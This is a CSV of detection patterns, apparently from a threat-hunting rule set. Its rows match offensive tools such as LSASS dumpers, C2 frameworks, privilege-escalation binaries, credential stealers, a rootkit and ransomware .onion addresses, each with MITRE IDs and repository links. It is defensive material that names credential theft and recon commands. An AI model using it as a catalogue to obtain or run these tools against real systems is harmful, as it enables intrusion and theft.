"*WwArAF0AIABEAHUAbQBwACAAZgBpAGwAZQAgAGUAbgBjAHIAeQBwAHQAZQBkACAAcwB1AGMAYwBlAHMAcwBmAHUAbABsAHkALgA=*",".{0,1000}WwArAF0AIABEAHUAbQBwACAAZgBpAGwAZQAgAGUAbgBjAHIAeQBwAHQAZQBkACAAcwB1AGMAYwBlAHMAcwBmAHUAbABsAHkALgA\=.{0,1000}","offensive_tool_keyword","Lsassx","Dumping LSASS Evaded Endpoint Security Solutions","T1003.001 - T1055.001 - T1203 - T1027 - T1070.004 - T1140 - T1564.001","TA0006 - TA0005 - TA0004","N/A","N/A","Credential Access","https://github.com/yehia-mamdouh/Lsassx","1","0","#base64","N/A","10","1","12","3","2025-02-15T16:41:38Z","2025-02-15T16:36:27Z","63134"
"*WwArAF0AIABMAFMAQQBTAFMAIABkAHUAbQBwACAAYwByAGUAYQB0AGUAZAAgAHMAdQBjAGMAZQBzAHMAZgB1AGwAbAB5AC4A*",".{0,1000}WwArAF0AIABMAFMAQQBTAFMAIABkAHUAbQBwACAAYwByAGUAYQB0AGUAZAAgAHMAdQBjAGMAZQBzAHMAZgB1AGwAbAB5AC4A.{0,1000}","offensive_tool_keyword","Lsassx","Dumping LSASS Evaded Endpoint Security Solutions","T1003.001 - T1055.001 - T1203 - T1027 - T1070.004 - T1140 - T1564.001","TA0006 - TA0005 - TA0004","N/A","N/A","Credential Access","https://github.com/yehia-mamdouh/Lsassx","1","0","#base64","N/A","10","1","12","3","2025-02-15T16:41:38Z","2025-02-15T16:36:27Z","63135"
"*WwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA*",".{0,1000}WwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA.{0,1000}","offensive_tool_keyword","CmdLineSpoofer","How to spoof the command line when spawning a new process from C#","T1055 - T1027 - T1036","TA0002 - TA0004 - TA0010","N/A","N/A","Defense Evasion","https://github.com/plackyhacker/CmdLineSpoofer","1","0","N/A","N/A","9","2","106","17","2021-12-28T18:56:25Z","2021-12-27T09:23:45Z","63136"
"*WwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBJAGQAZQBuAHQAaQB0AHkAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdAAoACkALgBuAGEAbQBlAAoA*",".{0,1000}WwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBJAGQAZQBuAHQAaQB0AHkAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdAAoACkALgBuAGEAbQBlAAoA.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","63137"
"*WwBzAGMAcgBpAHAAdABiAGwAbwBjAGsAXQAkAHgAPQB7AHcAaABvAGEAbQBpACAALwBhAGwAbAA7AGgAbwBzAHQAbgBhAG0AZQB9ADsAJAB4AC4AaQBuAHYAbwBrAGUAKAApAA*",".{0,1000}WwBzAGMAcgBpAHAAdABiAGwAbwBjAGsAXQAkAHgAPQB7AHcAaABvAGEAbQBpACAALwBhAGwAbAA7AGgAbwBzAHQAbgBhAG0AZQB9ADsAJAB4AC4AaQBuAHYAbwBrAGUAKAApAA.{0,1000}","offensive_tool_keyword","IPPrintC2","PoC for using MS Windows printers for persistence / command and control via Internet Printing","T1090 - T1133 - T1547.012 - T1572","TA0011 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/Diverto/IPPrintC2","1","0","#base64","lolc2","10","10","146","20","2024-05-03T11:13:38Z","2024-05-03T09:13:10Z","63138"
"*www.4everproxy.com/tor-proxy*",".{0,1000}www\.4everproxy\.com\/tor\-proxy.{0,1000}","offensive_tool_keyword","4everproxy","proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://www.4everproxy.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","63140"
"*www.ampliasecurity.com/research/wce12*",".{0,1000}www\.ampliasecurity\.com\/research\/wce12.{0,1000}","offensive_tool_keyword","WCE","manipulates and extracts credentials through NTLM - Kerberos and Digest Authentication","T1003 - T1550.003 - T1555.003 - T1557.001 - T1557.002 - T1078 - T1212","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/returnvar/wce","1","1","N/A","N/A","10","2","109","21","2019-09-15T05:26:40Z","2019-01-10T04:10:48Z","63142"
"*www.bad-rat.de.vu*",".{0,1000}www\.bad\-rat\.de\.vu.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","63145"
"*www.crackmd5.ru*",".{0,1000}www\.crackmd5\.ru.{0,1000}","offensive_tool_keyword","crackmd5.ru","site to crack md5 hashes used by Dispossessor ransomware groups and many others","T1003.002 - T1027 - T1213","TA0006 - TA0008 - TA0040","N/A","Dispossessor","Credential Access","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","63146"
"*www.exploit-db.com/download/*",".{0,1000}www\.exploit\-db\.com\/download\/.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","63148"
"*www.ftp.ne.jp/Linux/packages/blackarch/*/os/*",".{0,1000}www\.ftp\.ne\.jp\/Linux\/packages\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","63149"
"*www.kali.org/get-kali/*",".{0,1000}www\.kali\.org\/get\-kali\/.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A","63152"
"*www.leviathansecurity.com/blog/tunnelvision*",".{0,1000}www\.leviathansecurity\.com\/blog\/tunnelvision.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","1","N/A","N/A","9","2","132","17","2024-05-08T19:40:13Z","2024-03-11T22:24:56Z","63153"
"*www.mirrorservice.org/sites/blackarch.org/blackarch/*/os/*",".{0,1000}www\.mirrorservice\.org\/sites\/blackarch\.org\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","63158"
"*www.nicerat.com*",".{0,1000}www\.nicerat\.com.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","1","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","63159"
"*www.revshells.com*",".{0,1000}www\.revshells\.com.{0,1000}","offensive_tool_keyword","Rev-Shell","Basic script to generate reverse shell payloads","T1055.011 - T1021.005 - T1560.001","TA0002 - TA0005 - TA0042 - TA0011","N/A","N/A","C2","https://github.com/washingtonP1974/Rev-Shell","1","1","N/A","N/A","3","10","29","1","2024-03-20T13:58:21Z","2024-03-20T13:37:12Z","63161"
"*www.securityfocus.com/archive/1/514379*",".{0,1000}www\.securityfocus\.com\/archive\/1\/514379.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","63162"
"*www.tinymet.com*",".{0,1000}www\.tinymet\.com.{0,1000}","offensive_tool_keyword","TinyMet","meterpreter stager","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","CL0P - FIN7 - FIN11 - Silence group - GOLD EVERGREEN","C2","https://github.com/SherifEldeeb/TinyMet","1","1","N/A","N/A","10","10","128","43","2019-08-20T04:39:22Z","2014-05-17T13:31:55Z","63165"
"*www.tor2web.org*",".{0,1000}www\.tor2web\.org.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","1","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","63166"
"*www.vsecurity.com/download/tools/*",".{0,1000}www\.vsecurity\.com\/download\/tools\/.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","63167"
"*www.wfuzz.org*",".{0,1000}www\.wfuzz\.org.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","63168"
"*wxfuzz.bat*",".{0,1000}wxfuzz\.bat.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","63170"
"*wxfuzz.py*",".{0,1000}wxfuzz\.py.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","63171"
"*wxxp3rny7w3j6gkel56iomdw2ztfzqxlsdw3fyezrnohgh767bau6dqd.onion*",".{0,1000}wxxp3rny7w3j6gkel56iomdw2ztfzqxlsdw3fyezrnohgh767bau6dqd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","63172"
"*wy35mxvqxff4vufq64v4rrahxltn6ry33hjoogydwti6wbqutjaxrvid.onion*",".{0,1000}wy35mxvqxff4vufq64v4rrahxltn6ry33hjoogydwti6wbqutjaxrvid\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","63173"
"*WypdIENhbid0IENvbm5lY3QgQWxpeXVuIEJ1Y2tldC4=*",".{0,1000}WypdIENhbid0IENvbm5lY3QgQWxpeXVuIEJ1Y2tldC4\=.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","0","#base64","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","63174"
"*WypdIFRoZSBCdWNrZXQgb3IgUmVmbGVjdGl2ZSBETEwgVVJJIGlzIEVtcHR5Lg==*",".{0,1000}WypdIFRoZSBCdWNrZXQgb3IgUmVmbGVjdGl2ZSBETEwgVVJJIGlzIEVtcHR5Lg\=\=.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","0","#base64","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","63175"
"*WytdIEluamVjdGVkIHRoZSA=*",".{0,1000}WytdIEluamVjdGVkIHRoZSA\=.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","0","#base64","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","63176"
"*-x *net group *Domain Admins* /domain*",".{0,1000}\-x\s.{0,1000}net\sgroup\s.{0,1000}Domain\sAdmins.{0,1000}\s\/domain.{0,1000}","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","MuddyWater - Dispossessor","Discovery","https://github.com/ShawnDEvans/smbmap","1","0","N/A","N/A","10","10","1890","359","2025-02-28T18:09:10Z","2015-03-16T13:15:00Z","63177"
"*X32_ClSp_Tcp_Exe.exe*",".{0,1000}X32_ClSp_Tcp_Exe\.exe.{0,1000}","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","Equation Group","C2","https://github.com/APT64/EternalHushFramework","1","0","N/A","N/A","10","10","11","1","2023-10-28T13:08:06Z","2023-07-09T09:13:21Z","63178"
"*x64/CelestialSpark.asm*",".{0,1000}x64\/CelestialSpark\.asm.{0,1000}","offensive_tool_keyword","CelestialSpark","A modern 64-bit position independent meterpreter and Sliver compatible reverse_TCP Staging Shellcode based on Cracked5piders Stardust","T1572 - T1048 - T1041 - T1105","TA0005 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/Karkas66/CelestialSpark","1","1","N/A","N/A","10","10","103","10","2025-03-27T12:47:34Z","2024-04-11T12:17:22Z","63179"
"*x64\Debug\JuicyPotato*",".{0,1000}x64\\Debug\\JuicyPotato.{0,1000}","offensive_tool_keyword","JuicyPotato","Windows Local Privilege Escalation from Service Account to System","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/uknowsec/JuicyPotato","1","0","N/A","N/A","10","2","190","46","2021-07-01T05:28:41Z","2021-06-10T12:06:13Z","63180"
"*x64\Release\JuicyPotato*",".{0,1000}x64\\Release\\JuicyPotato.{0,1000}","offensive_tool_keyword","JuicyPotato","Windows Local Privilege Escalation from Service Account to System","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/uknowsec/JuicyPotato","1","0","N/A","N/A","10","2","190","46","2021-07-01T05:28:41Z","2021-06-10T12:06:13Z","63181"
"*X64_ClSp_Tcp_Exe.exe*",".{0,1000}X64_ClSp_Tcp_Exe\.exe.{0,1000}","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","Equation Group","C2","https://github.com/APT64/EternalHushFramework","1","0","N/A","N/A","10","10","11","1","2023-10-28T13:08:06Z","2023-07-09T09:13:21Z","63182"
"*x64PELoader/*.exe*",".{0,1000}x64PELoader\/.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","63183"
"*x64win-DynamicNoNull-WinExec-PopCalc-Shellcode*",".{0,1000}x64win\-DynamicNoNull\-WinExec\-PopCalc\-Shellcode.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/Metro-Holografix/DInjector","1","1","N/A","private github repo","8","","N/A","","","","63184"
"*x86_64-unknown-uefi*",".{0,1000}x86_64\-unknown\-uefi.{0,1000}","offensive_tool_keyword","bootkit-rs","Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus)","T1542.004 - T1067.002 - T1012 - T1053.005 - T1057","TA0002 - TA0040 - TA0003 - TA0001","N/A","N/A","Defense Evasion","https://github.com/memN0ps/bootkit-rs","1","1","N/A","N/A","N/A","6","528","67","2023-09-12T07:23:15Z","2023-04-11T03:53:15Z","63185"
"*x86PELoader/*.exe*",".{0,1000}x86PELoader\/.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","63186"
"*x86PELoader/test_agent_dll*",".{0,1000}x86PELoader\/test_agent_dll.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","63187"
"*x86PELoader/test_agent_exe*",".{0,1000}x86PELoader\/test_agent_exe.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","63188"
"*x86PELoader/test_proxy_dll*",".{0,1000}x86PELoader\/test_proxy_dll.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","63189"
"*x86PELoader/test_proxy_exe*",".{0,1000}x86PELoader\/test_proxy_exe.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","63190"
"*x90skysn3k/brutespray*",".{0,1000}x90skysn3k\/brutespray.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","1","N/A","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","63191"
"*xaitax/Chrome-App-Bound-Encryption-Decryption*",".{0,1000}xaitax\/Chrome\-App\-Bound\-Encryption\-Decryption.{0,1000}","offensive_tool_keyword","Chrome-App-Bound-Encryption-Decryption","Tool to decrypt App-Bound encrypted keys in Chrome using the IElevator COM interface with path validation and encryption protections","T1003 - T1081 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/xaitax/Chrome-App-Bound-Encryption-Decryption","1","1","N/A","N/A","9","5","401","73","2025-04-22T08:30:00Z","2024-10-27T11:28:35Z","63192"
"*xaitax/TotalRecall*",".{0,1000}xaitax\/TotalRecall.{0,1000}","offensive_tool_keyword","TotalRecall","extracts and displays data from the Recall feature in Windows 11","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/xaitax/TotalRecall","1","1","N/A","N/A","10","10","2011","159","2024-06-08T09:25:08Z","2024-06-03T16:38:04Z","63193"
"*xato-net-10-million-usernames.txt*",".{0,1000}xato\-net\-10\-million\-usernames\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","63195"
"*X-C2-Beacon*",".{0,1000}X\-C2\-Beacon.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","N/A","10","10","443","95","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z","63196"
"*x-cod3r/Remote-administration-tools-archive*",".{0,1000}x\-cod3r\/Remote\-administration\-tools\-archive.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","63197"
"*xcopy /y /d  *\msquic_schannel\msquic.dll*",".{0,1000}xcopy\s\/y\s\/d\s\s.{0,1000}\\msquic_schannel\\msquic\.dll.{0,1000}","offensive_tool_keyword","ntlmquic","POC tools for exploring SMB over QUIC protocol","T1210.002 - T1210.003 - T1210.004","TA0001","N/A","N/A","Exploitation tool","https://github.com/xpn/ntlmquic","1","0","N/A","network exploitation tool","6","2","122","15","2022-04-06T11:22:11Z","2022-04-05T13:01:02Z","63199"
"*xdp/backdoor.h*",".{0,1000}xdp\/backdoor\.h.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking -  persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux","N/A","10","10","1838","232","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z","63201"
"*xelroth/DEDSEC-RANSOMWARE*",".{0,1000}xelroth\/DEDSEC\-RANSOMWARE.{0,1000}","offensive_tool_keyword","DEDSEC-RANSOMWARE","dedsec ransomware","T1486 - T1489 - T1490 - T1495 - T1488 - T1482","TA0040 - TA0043 - TA0042 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/xelroth/DEDSEC-RANSOMWARE","1","1","N/A","N/A","10","1","7","1","2024-05-17T11:12:23Z","2024-05-17T10:34:03Z","63202"
"*xelroth/ShadowStealer*",".{0,1000}xelroth\/ShadowStealer.{0,1000}","offensive_tool_keyword","ShadowStealer","Google Chrome Passwords , Cookies and SystemInfo Dumper","T1555 - T1539 - T1125 - T1083 - T1056","TA0009 - TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/xelroth/ShadowStealer","1","1","N/A","N/A","10","","N/A","","","","63203"
